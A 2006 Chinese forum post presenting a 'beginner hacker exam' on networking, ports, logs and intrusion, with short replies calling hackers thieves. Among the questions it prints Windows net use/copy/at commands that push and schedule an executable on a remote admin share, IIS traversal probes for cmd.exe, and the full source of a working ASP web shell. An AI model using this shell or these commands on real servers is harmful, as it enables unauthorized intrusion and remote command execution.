誮訫靉 发表于 2006-5-31 01:26:00

黑客初级考试卷

<span id="copyid1" style="FONT-SIZE: 9pt;">黑客初级考试卷)) 有兴趣的来看看!顺便测试一下自已真正的水平哟! <br/>一、<br/>http://192.168.0.1<br/>http://xyz.3322.org<br/>http://3232235521<br/>三个连接指向同一目标网站,那么它们分别是什么意义?<br/><br/>二、<br/>常用端口识别<br/>20 21 23<br/>25 80 110<br/>139 443 445<br/><br/>三、<br/>试述下列命令作用<br/>c:\&gt;net use \\211.87.194.121\ipc$ “123456”/user:”administrator”<br/>c:\&gt;net use z: \\211.87.194.121\c$<br/>c:\&gt;net time \\211.87.194.121<br/>c:\&gt;copy abc.exe \\211.87.194.121\admin$\system32<br/><br/>四、<br/>试述下列命令的区别,如何防止该命令在本地或远程运行<br/>c:\&gt;at \\211.87.194.121 21:05 abc.exe<br/>c:\&gt;at 21:05 \\211.87.194.121\admin$\system32\abc.exe<br/><br/>五、<br/>W3SVC日志是什么?分析下面这段日志。<br/>2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -<br/>2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -<br/>2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -<br/>2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -<br/>2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -<br/>分析我酌情给分。<br/><br/>六、<br/>netstat命令有何作用,举出两个参数进行说明。<br/><br/>七、<br/>试述木马的一些基本特征。<br/><br/>八、<br/>如何利用脚本实现对ftp的自动操作?<br/><br/>九、<br/>下面是一个ASP木马,请找出支持这一程序的关键点。<br/>&lt;%@ Language=VBScript %&gt;<br/>&lt;%<br/><br/>Dim oScript<br/>Dim oScriptNet<br/>Dim oFileSys, oFile<br/>Dim szCMD, szTempFile<br/><br/>On Error Resume Next<br/><br/>Set oScript = Server.CreateObject("WSCRIPT.SHELL")<br/>Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")<br/>Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")<br/><br/>szCMD = Request.Form(".CMD")<br/>If (szCMD &lt;&gt; "") Then<br/><br/>szTempFile = "C:\" &amp; oFileSys.GetTempName( )<br/>Call oScript.Run ("cmd.exe /c " &amp; szCMD &amp; " &gt; " &amp; szTempFile, 0, True)<br/>Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)<br/>End If<br/>%&gt;<br/>&lt;HTML&gt;<br/>&lt;BODY&gt;<br/>&lt;FORM action="&lt;%= Request.ServerVariables("URL") %&gt;" method="POST"&gt;<br/>&lt;input type=text name=".CMD" size=45 value="&lt;%= szCMD %&gt;"&gt;<br/>&lt;input type=submit value="Run"&gt;<br/>&lt;/FORM&gt;<br/>&lt;PRE&gt;<br/>&lt;%<br/>If (IsObject(oFile)) Then<br/>On Error Resume Next<br/>Response.Write Server.HTMLEncode(oFile.ReadAll)<br/>oFile.Close<br/>Call oFileSys.DeleteFile(szTempFile, True)<br/>End If<br/>%&gt;<br/>&lt;/BODY&gt;<br/>&lt;/HTML&gt;<br/><br/>十、<br/>存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分)<br/>那么,如何在不打补丁的情况下避免这种攻击的发生?<br/><br/>十一、OSI模型中哪一层上有协议?分别是什么?<br/><br/>十二、观察ping命令的返回包的TTL值,可以了解到什么?<br/><br/>十三、从网关得到采样<br/>目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646<br/>目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647<br/>目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69<br/>请问 这可能是什么样的会话,采用什么协议,进行什么样的作业?<br/><br/>十四、谈谈你对hacker和网络安全的认识 <br/></span><br/><br/>

raphzy 发表于 2006-5-31 09:24:00

Jcomics 发表于 2006-5-31 22:18:00

<span id="copyid1" style="FONT-SIZE: 9pt;">黑客 = 小偷</span>

誮訫靉 发表于 2006-6-2 09:47:00

<p>可以这么说哦&nbsp; </p><p></p>
页: [1]
查看完整版本: 黑客初级考试卷